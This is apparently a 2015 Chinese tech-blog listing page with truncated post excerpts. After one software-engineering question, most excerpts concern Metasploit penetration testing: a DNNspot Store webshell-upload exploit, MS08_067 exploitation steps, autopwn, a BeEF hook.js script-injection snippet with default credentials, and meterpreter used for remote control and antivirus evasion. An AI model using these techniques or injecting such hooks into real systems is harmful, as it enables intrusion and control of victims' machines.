第六章: 老师您好,第六章中讲到的敏捷Agile,和第二章说到的单元测试有联系吗?因为他们毕竟都是有利于程序开发的东西。第七章:MSF是一个经验知识库,它包括以下方面的内容: 企业结构设计方案—采用交互的方式,侧重于制定长期规划,同时也能完成短期目标。 项目开发准则—包含组队模型和过程模型,用...
分类:
其他好文 时间:
2015-04-23 12:47:27
阅读次数:
122
DotNetNuke DNNspot Store <=3.0 GetShell exploit...
分类:
Web程序 时间:
2015-04-19 16:15:32
阅读次数:
492
MSFDotNetNukeDNNspotStore<=3.0GetShellexploitbyk8teamMSF里很多EXP都是反弹shell的用起来不方便1没exe执行权限时有些东西就蛋碎了2是大部分人都没VPS,你弹到哪去啊所以我弄了个直接上传webshell的脚本DNNspot_upload_aspx.rb#ExploitTitle:DotNetNukeDNNspotStore<=3...
分类:
Web程序 时间:
2015-04-19 06:41:38
阅读次数:
202
1、 进入终端,开启MSF相关服务2、 连接数据库3、 主机扫描发现如果有MS08_067漏洞,就可以继续渗透4、 开始溢出溢出成功的话sessions -l 查看存在的会话session -i 1 连接会话1shell 进入cmdshell参考文档:http://www.kissthink.com...
分类:
其他好文 时间:
2015-04-18 16:05:20
阅读次数:
212
存在漏洞的一些小软件,适合测试和演示用。附上漏洞小软件和msf利用模块。这些漏洞都在winXPsp3上面测试通过的。1、Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer OverflowCVE-2011-2140漏洞模块:exploi...
分类:
其他好文 时间:
2015-04-17 13:50:11
阅读次数:
288
本文介绍的autopwn是kali中自带的那个autopwn,不是相对于bt5被删除的那个autopwn.1.打开msfconsole, 找出autopwn目录及使用msf > search autopwnMatching Modules================ Name ...
分类:
编程语言 时间:
2015-03-29 14:52:46
阅读次数:
194
kali 网络服务策略使得其没有自动启动的网络服务,包括数据库服务,而metasploit需要数据库服务的支持,所以开启数据库服务的自动启动msf > db_status[*] postgresql selected, no connection简单开启服务:service postgresql s...
分类:
数据库 时间:
2015-03-28 20:17:49
阅读次数:
289
Kalilinux系统默认未安装beef,需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1:3000/ui/pannelbeef/beef嵌入代码<scriptsrc="Ip:3000/hook.js">与Metasploit联动Beef配置文件/usr/share/bee..
分类:
其他好文 时间:
2015-03-18 06:43:32
阅读次数:
692
Kalilinux系统默认未安装beef,需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1:3000/ui/pannelbeef/beef嵌入代码<scriptsrc="Ip:3000/hook.js">与Metasploit联动Beef配置文件/usr/share/bee..
分类:
其他好文 时间:
2015-03-18 06:42:11
阅读次数:
187
用过metasploit的人应该对meterpreter不陌生,它具有强大的功能,特别是其socks代理,简直就是内网渗透测试神器。由于meterpreter功能强大,萌生了想要把msf做远控的念头。另外,围绕meterpreter一个重要的问题,就是如何绕过杀软。这促使我决定一窥meterpret...
分类:
其他好文 时间:
2015-03-12 18:52:43
阅读次数:
380
